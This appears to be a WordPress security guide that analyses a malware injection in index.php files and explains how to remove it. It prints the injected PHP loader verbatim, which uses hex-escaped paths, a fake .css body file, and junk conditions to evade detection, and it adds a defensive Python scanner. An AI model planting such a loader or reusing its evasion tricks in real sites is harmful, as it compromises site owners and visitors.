Here is what to do if your WordPress site has an include statement in index.php that loads and executes malware.

Tampering in index.php that loads malware

The malware embeds the following code into the existing index.php files in various folders of the WordPress site. If a folder has no index.php, the malware creates one and places the code in it.

<?php
/*9c46d*/

$rhz7 = "/var/www/*******/wp\x2dincludes/p\x68p\x2dcompat/.a8f26ae0.css"; if ($rhz7 . '67'){ @include_once /* 44 */ ($rhz7); }

/*9c46d*/

Analyze malware code

The /*9c46d*/ part is an identifier that lets other malware (e.g., malware resident in a server process) determine whether the tampering has been removed.
Even after the tampering has been removed, other malware that automatically reinfects the server may still be present.

In the $rhz7 = "/var/www/*******/.a8f26ae0.css" section, the path to the body of the malware (which causes malicious behavior such as redirecting the site) is assigned to the variable.
In this case, the malware is disguised as a .css stylesheet.

The path

/wp\x2dincludes/p\x68p\x2dcompat/.a8f26ae0.css

is obfuscated with hex escapes. When deobfuscated, it reads

/wp-includes/php-compat/.a8f26ae0.css

which indicates that the malware itself is in the /wp-includes/php-compat/ folder.

The condition if ($rhz7 . '67'){ always evaluates to true. It is a meaningless piece of code inserted to avoid being caught by detection.
The same goes for the /* 44 */ comment.

@include_once ($rhz7); shows that every time index.php is executed, the malware body is loaded and executed with an include_once statement.

How to deal with include statements that load and execute malware

If you remove the code between the two /*9c46d*/ malware identifiers, the malware will no longer be loaded and executed each time index.php is accessed. However, if the file keeps being modified again, it is highly likely that another piece of reinfecting malware is somewhere on the server.
(There may be a process on the server that keeps running the malware in an infinite loop.)
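
An added example, not code from the original article: a Python scanner that walks a WordPress tree, finds every index.php containing a marker-wrapped include like the one analysed above, and decodes the \x escapes to show where the malware body is stored. The marker format (4 to 8 hex digits), the function names and the "example" docroot in the sample are assumptions.

```python
import re
from pathlib import Path

# Paired marker comments such as /*9c46d*/ ... /*9c46d*/ around the injected code.
# Assumption: markers are 4 to 8 lowercase hex digits, as in the sample on this page.
BLOCK_RE = re.compile(r"/\*([0-9a-f]{4,8})\*/(.*?)/\*\1\*/", re.S)
# A double-quoted PHP string assigned to a variable: $name = "...";
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"')
# include/require of a variable, tolerating @ and inline comments like /* 44 */.
INCLUDE_RE = re.compile(
    r"@?(?:include|require)(?:_once)?\s*(?:/\*.*?\*/\s*)*\(?\s*\$(\w+)", re.S)
HEX_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")


def decode_php_hex(s):
    """Decode PHP \\xHH string escapes (wp\\x2dincludes becomes wp-includes)."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_injections(source):
    """Return [(marker, decoded include path)] for each marker-wrapped include."""
    hits = []
    for block in BLOCK_RE.finditer(source):
        body = block.group(2)
        strings = {n: decode_php_hex(v) for n, v in ASSIGN_RE.findall(body)}
        for var in INCLUDE_RE.findall(body):
            if var in strings:
                hits.append((block.group(1), strings[var]))
    return hits


def scan_tree(root):
    """Map every tampered index.php under root to the injections found in it."""
    report = {}
    for path in Path(root).rglob("index.php"):
        hits = find_injections(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed sample modelled on the snippet above; "example" is a placeholder docroot.
SAMPLE = (
    "<?php\n/*9c46d*/\n\n"
    '$rhz7 = "/var/www/example/wp\\x2dincludes/p\\x68p\\x2dcompat/.a8f26ae0.css"; '
    "if ($rhz7 . '67'){ @include_once /* 44 */ ($rhz7); }\n\n/*9c46d*/\n"
)
```

Calling scan_tree on the site's document root lists each tampered index.php together with the decoded path of the file it includes, so both the injected blocks and the disguised malware body can be located for removal.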

If the malware is not removed as soon as possible, search engines may judge the site to be malware-infected and lower its search ranking, incorrect search results may be registered, or visitors to legitimate pages may be sent to another site.

We also recommend using a plug-in to perform a comprehensive inspection and removal of malware.
Free WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal].